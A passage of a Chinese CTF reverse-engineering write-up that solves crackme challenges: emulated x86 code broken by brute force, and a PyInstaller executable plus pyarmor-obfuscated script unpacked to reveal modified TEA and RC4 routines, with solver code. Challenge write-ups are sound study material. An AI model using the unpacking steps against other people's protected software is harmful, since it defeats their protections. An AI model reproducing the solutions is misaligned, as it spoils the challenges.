5 + 1 + 8 + 1 + 3 + 2 + 6 + 9 + 4 + 8 + 6 + 9 + 9 + 5 + 3 + 3 + 2 + 7 + 5 + 7 + 4 + 7 + 6 + 9 + 4 + 3 + 2 + 5 + 2 + 5 + 6 + 2 + 4 + 8 + 9 + 9 + 6 + 5 + 3 + 3 + 8 + 3 + 2 + 1 + 4) + int(3 + 8 + 5 + 4 + 5 + 8 + 7 + 7 + 2 + 7 + 4 + 5 + 7 + 6 + 7 + 6 + 4 + 4 + 8 + 4 + 2 + 4 + 7 + 2 + 4 + 4 + 6 + 3 + 7 + 7 + 3 + 1 + 8 + 1 + 3 + 9 + 6 + 6 + 5 + 1 + 1 + 5 + 6 + 3 + 2 + 4 + 7 + 7 + 6 + 5 + 8 + 5 + 1 + 6 + 8 + 7 + 1 + 5 + 2 + 1 + 3 + 9 + 5 + 7 + 5 + 2 + 7 + 5 + 5 + 9 + 6 + 7 + 2 + 1 + 9 + 5 + 1 + 3 + 5 + 2 + 2 + 2 + 1 + 1 + 4 + 8 + 9 + 4 + 8 + 8 + 5 + 3 + 3 + 1 + 9 + 7 + 9 + 6 + 1 + 5 + 3 + 9 + 2 + 7 + 4 + 4 + 9 + 7 + 5 + 3 + 9 + 1 + 4 + 3 + 6 + 6 + 6 + 9 + 3 + 7 + 6 + 3 + 9 + 4 + 7 + 4 + 7 + 3 + 3 + 2 + 4 + 6 + 3 + 6 + 4 + 4 + 2 + 5 + 1 + 8 + 1 + 3 + 3 + 4 + 5 + 7 + 7 + 9 + 4 + 2 + 5 + 2 + 9 + 7 + 8 + 1 + 1 + 2 + 6 + 6 + 5 + 6 + 1 + 1 + 9 + 9 + 4) + int(6 + 1 + 5 + 1 + 7 + 2 + 5 + 9 + 1 + 5 + 6 + 6 + 4 + 4 + 7 + 7 + 9 + 4 + 3 + 5 + 9 + 6 + 3 + 7 + 6 + 7 + 2 + 6 + 7 + 7 + 8 + 7 + 4 + 7 + 1 + 7 + 8 + 3 + 6 + 3 + 9 + 7 + 5 + 7 + 9 + 2 + 3 + 1 + 3 + 1 + 5 + 6 + 3 + 4 + 7 + 4 + 7 + 7 + 7 + 8 + 5 + 1 + 3 + 4 + 2 + 1 + 9 + 6 + 1 + 2 + 9 + 1 + 7 + 6 + 8 + 1 + 7 + 6 + 7 + 5 + 7 + 2 + 1 + 6 + 8 + 6 + 7 + 3 + 3 + 1 + 8 + 3 + 2 + 5 + 2 + 6 + 2 + 5 + 1 + 5 + 5 + 7 + 8 + 1 + 3 + 3 + 3 + 4 + 7 + 7 + 6 + 3 + 3 + 9 + 4 + 1 + 4 + 6 + 4 + 3 + 6 + 3 + 6 + 6 + 5 + 5 + 9 + 5 + 2 + 7 + 1 + 9 + 8 + 7 + 3 + 5 + 7 + 4 + 1 + 5 + 5 + 1 + 2 + 4 + 8 + 5 + 2 + 7 + 1 + 3 + 9 + 1 + 7 + 6 + 8 + 7 + 4 + 2 + 8 + 2 + 3 + 3 + 8 + 3 + 4 + 3 + 8 + 3 + 1 + 9 + 4 + 5 + 3 + 8 + 3 + 7 + 2 + 4 + 7 + 4 + 7 + 5 + 2 + 1) + int(2 + 1 + 6 + 2 + 1 + 6 + 5 + 7 + 1 + 3 + 2 + 1 + 4 + 3 + 9 + 5 + 5 + 2 + 6 + 8 + 6 + 6 + 9 + 3 + 7 + 9 + 6 + 8 + 6 + 8 + 6 + 3 + 4 + 1 + 4 + 2 + 5 + 1 + 1 + 1 + 6 + 9 + 6 + 7 + 9 + 3 + 7 + 1 + 4 + 5 + 9 + 3 + 9 + 2 + 2 + 7 + 6 + 9 + 2 + 4 + 6 + 1 + 1 + 2 + 2 + 5 + 6 + 1 + 4 + 7 + 8 + 9 + 1 + 3 + 4 + 8 + 2 + 3 + 3 + 4 + 9 + 1 + 6 + 8 + 6 + 2 + 7 + 3 + 3 + 8 + 2 + 2 + 5 + 9 + 1 + 2 + 1 + 1 + 4 + 5 + 4 + 8 + 3 + 5 + 5 + 9 + 1 + 4 + 3 + 5 + 7 + 2 + 7 + 8 + 6 + 4 + 6 + 5 + 9 + 7 + 7 + 4 + 2 + 6 + 7 + 2 + 8 + 3 + 8 + 4 + 1 + 5 + 6 + 9 + 5 + 6 + 4 + 5 + 8 + 4 + 4 + 9 + 5 + 9 + 1 + 2 + 3 + 7 + 9 + 1) + int(2 + 5 + 8 + 4 + 2 + 3 + 7 + 4 + 4 + 1 + 7 + 7 + 9 + 9 + 4 + 7 + 7 + 8 + 9) + int(7 + 8 + 7 + 3 + 3 + 9 + 4 + 8 + 4 + 7 + 2 + 8 + 8 + 8 + 7 + 1 + 1 + 3 + 1 + 3 + 9 + 9 + 7 + 8 + 1 + 3 + 5 + 1 + 5 + 6 + 9 + 8 + 9 + 9 + 9 + 9 + 9 + 2 + 2 + 2 + 9 + 6 + 2 + 8 + 7 + 9 + 5 + 9 + 8 + 4 + 2 + 4 + 7 + 5 + 7 + 8 + 6 + 3 + 3 + 4 + 5 + 7 + 4 + 8 + 8 + 4 + 1 + 7 + 1 + 3 + 1 + 9 + 7 + 3 + 1 + 4 + 9 + 7 + 7 + 7 + 7 + 7 + 2 + 7 + 4 + 7 + 5 + 7 + 7 + 7 + 1 + 8 + 1 + 5 + 7 + 4 + 2 + 9 + 7 + 8 + 6 + 3 + 7 + 8 + 6 + 2 + 2 + 4 + 3 + 3 + 9 + 4 + 4 + 7 + 3 + 3 + 5 + 6 + 4 + 1 + 8 + 5 + 6 + 8 + 4 + 7 + 5 + 3 + 3 + 4 + 6 + 8 + 7 + 6 + 8 + 8 + 6 + 7 + 5 + 1 + 9 + 6 + 8 + 8 + 5 + 4 + 1) + int(5 + 9 + 4 + 6 + 8 + 7 + 9 + 8 + 5 + 7 + 4 + 8 + 7 + 4 + 3 + 3 + 5 + 4 + 3 + 7 + 7 + 6 + 7 + 2 + 9 + 1 + 6 + 6 + 2 + 5 + 3 + 7 + 9 + 3 + 6 + 2 + 4 + 4 + 2 + 7 + 4 + 2 + 3 + 3 + 6 + 5 + 4 + 5 + 9 + 3 + 4 + 3 + 5 + 1 + 4 + 9 + 7 + 7 + 7 + 4 + 7 + 9 + 4 + 1 + 8 + 3 + 1 + 6 + 8 + 4 + 8 + 3 + 2 + 2 + 3 + 2 + 6 + 6 + 9 + 6 + 3 + 8 + 7 + 7 + 3 + 5 + 1 + 6 + 8 + 9 + 2 + 2 + 2 + 5 + 5 + 1 + 8 + 8 + 9 + 3 + 9 + 9 + 4 + 8 + 6 + 2 + 9 + 8 + 6 + 7 + 4 + 3 + 1 + 1 + 7 + 4 + 5 + 2 + 1 + 2 + 2 + 7 + 6 + 1 + 9 + 2 + 7 + 4 + 2 + 1 + 9 + 6 + 4 + 1 + 1 + 6 + 1 + 6 + 8 + 6 + 3 + 5 + 6 + 8 + 5 + 5 + 8 + 6 + 1 + 6 + 8 + 2 + 9 + 9 + 6) + int(4 + 4 + 9 + 6 + 9 + 2 + 8 + 3 + 1 + 5 + 6 + 3 + 9 + 1 + 3 + 5 + 1 + 1 + 1 + 9 + 8 + 8 + 2 + 1 + 9 + 5 + 8 + 1 + 1 + 1 + 2 + 9 + 4 + 7 + 4 + 5 + 6 + 6 + 7 + 6 + 6 + 8 + 8 + 9 + 4 + 1 + 8 + 5 + 5 + 9 + 2 + 6 + 4 + 7 + 9 + 5 + 3 + 7 + 1 + 9 + 8 + 1 + 7 + 2 + 2 + 8 + 3 + 2 + 6 + 4 + 1 + 7 + 7 + 2 + 9 + 8 + 8 + 2 + 9 + 7 + 1 + 8 + 4 + 4 + 4 + 6 + 2 + 3 + 2 + 3 + 9 + 2 + 3 + 2 + 5 + 7 + 1 + 2 + 3 + 7 + 6 + 4 + 4 + 2 + 8 + 2 + 6 + 1 + 9 + 6 + 3 + 9 + 2 + 5 + 6 + 7 + 1 + 7 + 2 + 5 + 2 + 2 + 5 + 1 + 4 + 7 + 2 + 4 + 1) + int(9 + 5 + 4 + 1 + 4 + 9 + 3 + 4 + 1 + 6 + 4 + 1 + 3 + 6 + 9 + 6 + 9 + 8 + 6 + 5 + 7 + 7 + 2 + 9 + 2 + 9 + 8 + 5 + 6 + 5 + 4 + 1 + 4 + 5 + 2 + 3 + 9 + 5 + 8 + 7 + 3 + 9 + 5 + 1 + 8) + int(1 + 7 + 1 + 4 + 2 + 7 + 5 + 4 + 2 + 6 + 2 + 3 + 4 + 2 + 7 + 2 + 3 + 3 + 7 + 3 + 3 + 6 + 8 + 2 + 2 + 6 + 2 + 2 + 6 + 7 + 7 + 1 + 2 + 9 + 8 + 3 + 1 + 4 + 4 + 1 + 9 + 9 + 9 + 7 + 1 + 3 + 5 + 8 + 3 + 8 + 5 + 6 + 2 + 6 + 4 + 6 + 2 + 8 + 8 + 6 + 6 + 1 + 3 + 5 + 7 + 3 + 1 + 8 + 2 + 9 + 7 + 6 + 6 + 6 + 9 + 9 + 6 + 4 + 7 + 6 + 6 + 9 + 9 + 8 + 5 + 9 + 6 + 2 + 3 + 9 + 7 + 1 + 7 + 8 + 2 + 2 + 2 + 2 + 1 + 2 + 9 + 1 + 4 + 8 + 1 + 4 + 6 + 2 + 4 + 9 + 6 + 9 + 7 + 3 + 5 + 4 + 7 + 4 + 1 + 6 + 1 + 3 + 6 + 5 + 5 + 8 + 3 + 7 + 8 + 8 + 5 + 9 + 5 + 3 + 7 + 5 + 3 + 6 + 1 + 7 + 7 + 3 + 2 + 7 + 2 + 4 + 2 + 6 + 2 + 6 + 2 + 4 + 2 + 4 + 7 + 2 + 1 + 6 + 5 + 2 + 4 + 8 + 3 + 7) + int(7 + 2 + 8 + 3 + 7 + 3 + 3 + 9 + 8 + 5 + 4 + 6 + 4 + 3 + 4 + 8 + 7 + 4 + 2 + 9 + 5 + 2 + 9 + 4 + 9 + 2) + int(0) + int(0) + int(1 + 1) + int(1 + 7 + 8 + 2 + 4 + 5 + 2 + 9 + 1 + 2 + 5 + 1 + 5 + 4 + 1 + 7 + 5 + 1 + 9 + 9 + 2 + 8 + 2 + 1 + 8 + 5 + 8 + 9 + 6 + 2 + 6 + 9 + 6 + 9 + 6 + 4 + 5 + 8 + 3 + 9 + 3 + 3 + 2 + 4 + 5 + 7 + 2 + 9 + 6 + 9 + 7 + 3 + 4 + 7 + 8 + 4 + 3 + 9 + 3 + 9 + 9 + 3 + 6 + 1 + 1 + 9 + 9 + 9 + 5 + 7 + 4 + 6 + 6 + 9 + 1 + 2 + 2 + 6 + 8 + 3 + 2 + 3 + 1 + 3 + 3 + 1 + 7 + 7 + 7 + 2 + 4 + 5 + 4 + 3 + 8 + 5 + 6 + 7 + 4 + 1 + 4 + 6 + 8 + 6 + 4 + 1 + 3 + 8 + 9 + 6 + 1 + 9 + 9 + 5 + 7 + 6 + 2 + 6 + 6 + 2 + 1 + 8 + 8 + 2 + 5 + 3 + 5 + 1 + 3 + 7 + 8 + 9 + 3 + 3 + 1 + 7 + 4 + 5 + 6 + 7 + 6 + 7 + 3 + 2 + 6 + 2 + 8 + 2 + 4 + 9 + 4 + 3 + 2 + 4 + 1 + 8 + 7 + 9 + 4 + 9 + 5 + 4 + 2 + 1 + 7 + 1 + 2 + 2 + 1 + 5 + 5 + 7 + 3 + 9 + 3 + 8 + 8 + 5 + 4 + 2 + 8 + 9 + 2 + 2 + 2 + 3 + 2 + 5 + 6 + 3 + 9 + 9 + 7 + 7 + 7 + 3) + int(8 + 8 + 7 + 8 + 6 + 3 + 2 + 1 + 4 + 1 + 3 + 3 + 6 + 5 + 6 + 8 + 8 + 4 + 3 + 1 + 4 + 3 + 6 + 1 + 5 + 4 + 3 + 3 + 9 + 4 + 8 + 4 + 3 + 7 + 3 + 7 + 8 + 9 + 7 + 1 + 9 + 6 + 7 + 5 + 1 + 1 + 1 + 2 + 9 + 4 + 6 + 7 + 3 + 5 + 2 + 5 + 2 + 3 + 4 + 7 + 6 + 4 + 6 + 2 + 7 + 2 + 7 + 3 + 5 + 6 + 8 + 7 + 6 + 9 + 7 + 6 + 2 + 5 + 7 + 9 + 4 + 2 + 9 + 8 + 8 + 7 + 7 + 6 + 2 + 7 + 2 + 4 + 3 + 6 + 1 + 9 + 6 + 1 + 4 + 5 + 6 + 9 + 5 + 1 + 7 + 8 + 3 + 5 + 6 + 3 + 5 + 6 + 3 + 8 + 5 + 6 + 1 + 7 + 8 + 7 + 6 + 9) + int(1 + 4 + 6 + 5 + 8 + 4 + 9 + 7 + 7 + 9 + 4 + 9 + 7 + 1 + 6 + 1 + 1 + 6 + 9 + 1 + 1 + 9 + 1 + 5 + 9 + 6 + 2 + 5 + 4 + 3 + 1 + 2 + 9 + 7 + 6 + 6 + 7 + 7 + 8 + 6 + 6 + 9 + 8 + 5 + 9 + 4 + 1 + 4 + 9 + 7 + 6 + 2 + 8 + 5 + 3 + 6 + 7 + 1 + 4 + 7 + 4 + 4 + 7 + 4 + 3 + 5 + 1 + 3 + 1 + 8 + 4 + 4 + 5 + 7 + 8 + 7 + 4 + 6 + 9 + 7 + 1 + 5 + 6 + 3 + 2 + 2 + 7 + 6 + 5 + 5 + 9 + 1 + 4 + 7 + 7 + 7 + 8 + 7 + 7 + 2 + 8 + 6 + 9 + 7 + 1 + 6 + 3 + 9 + 3 + 8 + 5 + 9 + 5 + 1 + 8 + 1 + 7 + 3 + 5 + 7 + 8 + 7 + 1 + 9 + 2 + 2 + 2 + 9 + 1 + 1 + 8 + 6 + 5 + 5 + 4 + 8) + int(9 + 8 + 1 + 6 + 3 + 8 + 6 + 5 + 9 + 1 + 8 + 1 + 3 + 3 + 4 + 6 + 9 + 3 + 2 + 6 + 4 + 5 + 4 + 3 + 6 + 9 + 3 + 3 + 8 + 4 + 9 + 7 + 3 + 4 + 5 + 4 + 8 + 6 + 2 + 5 + 3 + 6 + 8 + 2 + 8 + 3 + 6 + 5 + 8 + 2 + 7 + 1 + 6 + 5 + 8 + 2 + 2 + 7 + 8 + 1 + 9 + 1 + 4 + 7 + 8 + 9 + 5 + 7 + 8 + 7 + 6 + 1 + 9 + 6 + 4 + 3 + 6 + 6 + 6 + 9 + 1 + 5 + 6 + 8 + 7 + 2 + 7 + 1 + 4 + 9 + 6 + 3 + 5 + 8 + 6 + 6 + 2 + 5 + 2 + 9 + 7 + 5 + 3 + 4 + 7 + 3 + 2 + 6 + 6 + 6 + 2 + 2 + 1 + 1 + 1 + 5 + 6 + 2 + 9 + 4 + 4 + 8 + 2 + 4 + 8 + 2 + 1 + 7 + 4 + 9 + 3 + 8 + 5 + 5 + 9 + 6 + 6 + 1 + 3 + 7 + 3 + 3 + 9 + 8 + 7 + 3 + 1 + 8 + 2 + 2 + 1 + 3 + 5 + 5 + 6 + 4 + 7 + 2 + 8 + 3 + 7 + 7 + 2 + 4 + 8 + 9 + 2 + 6 + 2 + 4) + int(9 + 5 + 1 + 1 + 6 + 7 + 2 + 3 + 6 + 4 + 7 + 4 + 8 + 7 + 4 + 6 + 1 + 2 + 5 + 1 + 1 + 5 + 1 + 3 + 9 + 7 + 7 + 6 + 1 + 3) + int(4 + 2 + 1 + 7 + 3 + 7 + 9 + 8 + 1 + 2 + 2 + 4 + 8 + 6 + 4 + 5 + 4 + 2 + 5 + 5 + 8 + 2 + 7 + 8 + 6 + 2 + 7 + 9 + 5 + 9 + 2 + 6 + 5 + 4 + 8 + 2 + 4 + 5 + 4 + 6 + 8 + 9 + 4 + 5 + 8 + 1 + 8 + 1 + 6 + 3 + 8 + 4 + 4 + 8 + 8 + 5 + 1 + 2 + 9 + 8 + 9 + 1 + 9 + 7 + 5 + 1 + 5 + 7 + 9 + 2 + 1 + 4 + 2 + 5 + 2) + int(7 + 2 + 4 + 6 + 2 + 6 + 1 + 4 + 7 + 5 + 6 + 2 + 9 + 4 + 7 + 3 + 5 + 8 + 5 + 6 + 4 + 1 + 4 + 3 + 6 + 1 + 1 + 9 + 5 + 5 + 2 + 7 + 4 + 2 + 7 + 7 + 3 + 4 + 1 + 7 + 9 + 7 + 8 + 6 + 5 + 1 + 7 + 1 + 5 + 8 + 3 + 2 + 8 + 9 + 5 + 1 + 9 + 1 + 4 + 8 + 7 + 6 + 8 + 5 + 4 + 7 + 4 + 2 + 4 + 7 + 9 + 5 + 7 + 5 + 1 + 8 + 4 + 4 + 5 + 7 + 9 + 4 + 3 + 7 + 7 + 9 + 1 + 8 + 6 + 9 + 8 + 7 + 1 + 9 + 1 + 5 + 9 + 5 + 7 + 1 + 1 + 5 + 8 + 4 + 8 + 9 + 6 + 9 + 5 + 5 + 5 + 3 + 8 + 1 + 6 + 6 + 9 + 9 + 2 + 4 + 6 + 2 + 7 + 1 + 6 + 4 + 6 + 1 + 8 + 6 + 9 + 6 + 5 + 2 + 6 + 9 + 8 + 8 + 6 + 8 + 8 + 3 + 2 + 3 + 7 + 9 + 4 + 3 + 4 + 8 + 8 + 9 + 4 + 6 + 6 + 1 + 7 + 5 + 7 + 2 + 5 + 4 + 5 + 5) + int(5 + 2 + 1 + 6 + 8 + 8 + 6 + 5 + 9 + 2 + 7 + 1 + 9 + 5 + 3 + 6 + 4 + 9 + 5 + 7 + 5 + 5 + 1 + 4 + 4 + 5 + 8 + 5 + 8 + 6 + 8 + 5 + 9 + 9 + 3 + 2 + 4 + 1 + 6 + 2 + 5 + 1 + 7 + 8 + 7 + 5 + 4 + 8 + 5 + 2 + 7 + 5 + 9 + 4 + 9 + 5 + 2 + 3 + 9 + 2 + 7 + 7 + 4 + 5 + 1 + 4 + 7 + 9 + 3 + 2 + 6 + 6 + 7 + 4 + 3 + 7 + 8 + 2 + 7 + 4 + 6 + 4 + 4) + int(8 + 6 + 3 + 4 + 6 + 4 + 5 + 7 + 3 + 2 + 9 + 7 + 5 + 1 + 1 + 9 + 5 + 7 + 6 + 6 + 4 + 3 + 1 + 2 + 5 + 6 + 4 + 5 + 8 + 9 + 2 + 6 + 3 + 2 + 9 + 9 + 5 + 6 + 1 + 9 + 8 + 5 + 2 + 4 + 1 + 1 + 2 + 3 + 2 + 3 + 1 + 1 + 8 + 2 + 8 + 4 + 7 + 9 + 3 + 3 + 3 + 1 + 3 + 2 + 7 + 8 + 5 + 2 + 5 + 1 + 6 + 8 + 9 + 8 + 6 + 6 + 6 + 8 + 2 + 9 + 2 + 4 + 6 + 6 + 5 + 8 + 9 + 9 + 5 + 8 + 8 + 5 + 3 + 8 + 5 + 4 + 3 + 6 + 6 + 2 + 5 + 2 + 2 + 2 + 8 + 4 + 7 + 2 + 3 + 9 + 5 + 4 + 3 + 4 + 9 + 6 + 4 + 5 + 7 + 1 + 1 + 2 + 7 + 7 + 3 + 2 + 7 + 1 + 6 + 5 + 6 + 4 + 1 + 8 + 6 + 4 + 7 + 1 + 4 + 9 + 3 + 9 + 8 + 5 + 7 + 4 + 9 + 2 + 2 + 8 + 1 + 5 + 2 + 5 + 3 + 2 + 8 + 4 + 8 + 7 + 6 + 3 + 8 + 7 + 5 + 5 + 7 + 1 + 6 + 2 + 8 + 8 + 6 + 5 + 8 + 4 + 9 + 7 + 3 + 5 + 3 + 6 + 9 + 6 + 1 + 3 + 6 + 3 + 6 + 8 + 1 + 2 + 6 + 8 + 4 + 8) + int(2 + 4 + 9 + 3 + 2 + 2 + 5 + 6 + 7 + 1 + 8 + 5 + 8 + 9 + 5 + 7 + 8 + 6 + 5 + 1 + 7 + 7 + 9 + 6 + 4 + 7 + 1 + 7 + 6 + 3 + 6 + 4 + 2 + 8 + 2 + 4 + 5 + 4 + 2 + 8 + 2 + 5 + 3 + 4 + 1 + 1 + 9 + 5 + 6 + 8 + 1 + 7 + 8 + 5 + 2 + 6 + 6 + 1 + 1 + 9 + 7 + 7 + 6 + 4 + 1 + 8 + 9 + 3 + 8 + 3 + 2 + 7 + 9 + 9 + 4 + 1 + 4 + 2 + 3 + 2 + 1 + 1 + 4 + 4 + 6 + 1 + 2 + 6 + 1 + 7 + 3 + 6 + 1 + 2 + 5 + 4 + 8 + 3 + 6 + 9 + 5 + 3 + 9 + 4 + 6 + 8 + 2 + 9 + 4 + 3 + 8 + 2 + 9 + 6 + 4 + 3 + 6 + 5 + 1 + 4 + 3 + 7 + 9 + 1 + 2 + 8 + 3 + 3 + 9 + 2 + 8 + 1 + 9 + 1 + 3 + 4 + 9 + 7 + 9 + 9 + 1 + 8 + 2 + 6 + 4 + 1 + 7 + 5 + 4 + 3 + 3 + 5 + 2 + 2 + 6 + 1 + 9 + 1 + 5 + 4 + 3 + 4 + 4 + 1 + 9 + 3 + 2 + 5 + 6 + 6 + 4 + 1 + 4 + 3 + 1) + int(0) + int(1 + 3 + 7 + 2 + 2 + 5 + 1)))
print("enc = ",encrypt)
还原一下调用流程
from unicorn import Uc, UC_ARCH_X86, UC_MODE_64, UC_PROT_READ, UC_PROT_WRITE, UC_PROT_EXEC
from unicorn.x86_const import *
user_input = input()
uc = Uc(UC_ARCH_X86, UC_MODE_64)
uc.mem_map(0x1000000, 0x200000) # 代码区
uc.mem_map(0x1200000, 0x10000) # 数据区
code = b'\xf3\x0f\x1e\xfaUH\x89\xe5H\x89}\xe8\x89u\xe4\x89\xd0\x88E\xe0\xc7E\xfc\x00\x00\x00\x00\xebL\x8bU\xfcH\x8bE\xe8H\x01\xd0\x0f\xb6\x00\x8d\x0c\xc5\x00\x00\x00\x00\x8bU\xfcH\x8bE\xe8H\x01\xd0\x0f\xb6\x002E\xe0\x8d4\x01\x8bU\xfcH\x8bE\xe8H\x01\xd0\x0f\xb6\x00\xc1\xe0\x05\x89\xc1\x8bU\xfcH\x8bE\xe8H\x01\xd0\x8d\x14\x0e\x88\x10\x83E\xfc\x01\x8bE\xfc;E\xe4r\xac\x90\x90]'
enc = '425MvHMxtLqZ3ty3RZkw3mwwulNRjkswbpkDMK+3CDCOtbe6kzAqPyrcEAI='
uc.mem_write(0x1000000, code)
uc.mem_write(0x1201000, user_input)
uc.reg_write(UC_X86_REG_RSP, 0x120ffff)
uc.reg_write(UC_X86_REG_RDI, 0x1201000)
uc.reg_write(UC_X86_REG_RSI, 44)
uc.reg_write(UC_X86_REG_RDX, 7)
try:
uc.emu_start(0x1000000, 0x1000074)
result = uc.mem_read(0x1201000, 44)
except Exception as e:
pass刚好模拟执行的是Intel x86的机器码,直接十六进制写到bin文件里,然后扔进ida反编译
加密是单字节的线性运算,爆破即可
import base64
digist_table = b"0123456789"
lower_table = b"abcdefghijklmnopqrstuvwxyz"
supper_table = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
punct_table = b"!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}"
brute_table = digist_table + lower_table + supper_table + punct_table
enc = '425MvHMxtLqZ3ty3RZkw3mwwulNRjkswbpkDMK+3CDCOtbe6kzAqPyrcEAI='
enc_list = list(base64.b64decode(enc))
def encrypt(byte):
res = ((byte * 8) + (byte ^ 7) + (byte << 5)) & 0xff
return res
for index in range(0,44):
for ch in brute_table:
check = encrypt(ch)
if check == enc_list[index]:
print(chr(ch),end="")ez_py | solved
题目一共给出2个待分析文件,一个是PyInstaller打包的exe文件,另一个是受pyarmor加密混淆的src.py
-
先分析key.exe
pyinstxtractor解包拿到pyc,进一步反编译。
首先尝试使用pycdc进行反编译,但是报错相当严重。改用在线的PyLingual能还原出完整代码,但是反编译过程中也对原始bytecode做了很多patch,而且仍然存在语法错误
对于报错的Phrolova函数,直接用pycdas取出对应部分的bytecode,交给deepseek重新反编译。def Phrolova(o0o0o17): o0oA = 'Carlotta' o0oB = ['o0oC', 'o0oD', 'o0oE', 'o0oF'] o0oG = [] o0oG.append(ast.Assign(targets=[ast.Name(id='o0oH', ctx=ast.Store())],value=ast.Constant(305419896))) o0oG.append(ast.Assign(targets=[ast.Name(id='o0oI', ctx=ast.Store())],value=ast.BinOp(ast.Name(id='o0oE', ctx=ast.Load()), ast.BitAnd(),ast.Constant(65535)))) o0oG.append(ast.Assign(targets=[ast.Name(id='o0oJ', ctx=ast.Store())],value=ast.BinOp(ast.BinOp(ast.Name(id='o0oE', ctx=ast.Load()), ast.RShift(),ast.Constant(16)), ast.BitAnd(), ast.Constant(65535)))) o0oG.append(ast.Assign(targets=[ast.Name(id='o0oK', ctx=ast.Store())],value=ast.BinOp(ast.BinOp(ast.Name(id='o0oE', ctx=ast.Load()), ast.BitXor(),ast.Name(id='o0oF', ctx=ast.Load())), ast.BitAnd(), ast.Constant(65535)))) o0oG.append(ast.Assign(targets=[ast.Name(id='o0oL', ctx=ast.Store())],value=ast.BinOp(ast.BinOp(ast.BinOp(ast.Name(id='o0oE', ctx=ast.Load()),ast.RShift(), ast.Constant(8)), ast.BitXor(), ast.Name(id='o0oF',ctx=ast.Load())), ast.BitAnd(), ast.Constant(65535)))) o0oG.append(ast.Assign(targets=[ast.Name(id='o0oM', ctx=ast.Store())],value=ast.BinOp(ast.BinOp(ast.Name(id='o0oH', ctx=ast.Load()), ast.Mult(),ast.BinOp(ast.Name(id='o0oF', ctx=ast.Load()), ast.Add(), ast.Constant(1))),ast.BitAnd(), ast.Constant(4294967295)))) o0oG.append(ast.Assign(targets=[ast.Name(id='o0oN', ctx=ast.Store())],value=ast.BinOp(ast.BinOp(ast.BinOp(ast.BinOp(ast.Name(id='o0oD',ctx=ast.Load()), ast.LShift(), ast.Constant(5)), ast.Add(), ast.Name(id='o0oI',ctx=ast.Load())), ast.BitXor(), ast.BinOp(ast.Name(id='o0oD', ctx=ast.Load()),ast.Add(), ast.Name(id='o0oM', ctx=ast.Load()))), ast.BitXor(),ast.BinOp(ast.BinOp(ast.Name(id='o0oD', ctx=ast.Load()), ast.RShift(),ast.Constant(5)), ast.Add(), ast.Name(id='o0oJ', ctx=ast.Load()))))) o0oG.append(ast.Assign(targets=[ast.Name(id='o0oP', ctx=ast.Store())],value=ast.BinOp(ast.BinOp(ast.Name(id='o0oC', ctx=ast.Load()), ast.Add(),ast.Name(id='o0oN', ctx=ast.Load())), ast.BitAnd(), ast.Constant(65535)))) o0oG.append(ast.Assign(targets=[ast.Name(id='o0oN', ctx=ast.Store())],value=ast.BinOp(ast.BinOp(ast.BinOp(ast.BinOp(ast.Name(id='o0oP',ctx=ast.Load()), ast.LShift(), ast.Constant(5)), ast.Add(), ast.Name(id='o0oK',ctx=ast.Load())), ast.BitXor(), ast.BinOp(ast.Name(id='o0oP', ctx=ast.Load()),ast.Add(), ast.Name(id='o0oM', ctx=ast.Load()))), ast.BitXor(),ast.BinOp(ast.BinOp(ast.Name(id='o0oP', ctx=ast.Load()), ast.RShift(),ast.Constant(5)), ast.Add(), ast.Name(id='o0oL', ctx=ast.Load()))))) o0oG.append(ast.Assign(targets=[ast.Name(id='o0oQ', ctx=ast.Store())],value=ast.BinOp(ast.BinOp(ast.Name(id='o0oD', ctx=ast.Load()), ast.Add(),ast.Name(id='o0oN', ctx=ast.Load())), ast.BitAnd(), ast.Constant(65535)))) o0oG.append(ast.Return(ast.Tuple(elts=[ast.Name(id='o0oP', ctx=ast.Load()),ast.Name(id='o0oQ', ctx=ast.Load())], ctx=ast.Load()))) o0oU = ast.FunctionDef(name=o0oA, args=ast.arguments(posonlyargs=[], args=[ast.arg(arg=a) for a in o0oB], kwonlyargs=[], kw_defaults=[], defaults=[]),body=o0oG, decorator_list=[]) o0oV = ast.parse('\ndef _tea_helper_func(a, b, c):\n magic1 = (a ^ b) &0xDEADBEEF\n magic2 = (c << 3) | (a >> 5)\n return (magic1 + magic2 - (b &0xCAFEBABE)) & 0xFFFFFFFF\n\ndef _fake_tea_round(x, y):\n return ((x *0x9E3779B9) ^ (y + 0x12345678)) & 0xFFFFFFFF\n\n_tea_magic_delta = 0x9E3779B9 ^0x12345678\n_tea_dummy_keys = [0x1111, 0x2222, 0x3333, 0x4444]\n').body o0oW = ast.Module(body=[o0oU] + o0oV, type_ignores=[]) ast.fix_missing_locations(o0oW) o0oX = compile(o0oW, filename='<tea_obf_ast>', mode='exec') # print(dis.dis(o0oX)) o0oY = {} exec(o0oX, o0oY) if o0oA in o0oY: o0o0o17[o0oA] = o0oY[o0oA] return None之后发现Phrolova函数使用ast模块动态编译了另一个函数Carlotta,不能静态看到其逻辑。考虑运行时使用dis.dis输出codetype对象的反编译结果
代码中还有对变量名的混淆,通过查找替换可以批量重命名
梳理出加密流程:shouan -> Carlotta -> changli。两个加密都是变种TEA,细节上略有不同 - 分析pyarmor
pyarmor-1shot进行解包,一开始提示找不到data,后面在bytecode前面加上PY000000就能识别了。
def init(key, key_len): '__pyarmor_enter_54746__(...)' i = 0 sbox = None(list, None(range, 256)) for j in None(range, 256): i = (i + sbox[j] + key[j % key_len]) % 256 sbox[j], sbox[i] = sbox[i], sbox[j] '__pyarmor_exit_54747__(...)' return sbox
def make(box):
'pyarmor_enter_54749(...)'
i = 0
j = 0
reslut = []
for count in None(range, 256):
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
k = (box[i] + box[j] + count % 23) % 256
reslut.append(box[k])
'pyarmor_exit_54750(...)'
return reslut
只有两个函数,一眼看出是RC4,但是稍有魔改。
加密流程在make.__doc__,需要用到前面key.exe验证的key。先解出key再解rc4
```python
from ctypes import *
def spilt_word(num):
high_word = num >> 16
low_word = num & 0xffff
return (high_word, low_word)
def combine_word(high_word, low_word):
return high_word << 16 | low_word
def tea_decrypt(d1,d2,key):
delta = 0x87456123
d1 = c_uint32(d1)
d2 = c_uint32(d2)
k0 = key & 0xffffffff
k1 = (key >> 8 ^ 0x12345678) & 0xffffffff
k2 = (key << 4 ^ 0x87654321) & 0xffffffff
k3 = (key >> 12 ^ 0xabcdef00) & 0xffffffff
number = c_uint32(delta * 32)
for i in range(32):
d2.value -= ((d1.value<<4) + k2) ^ ((d1.value>>4) + k3) ^ (d1.value + number.value)
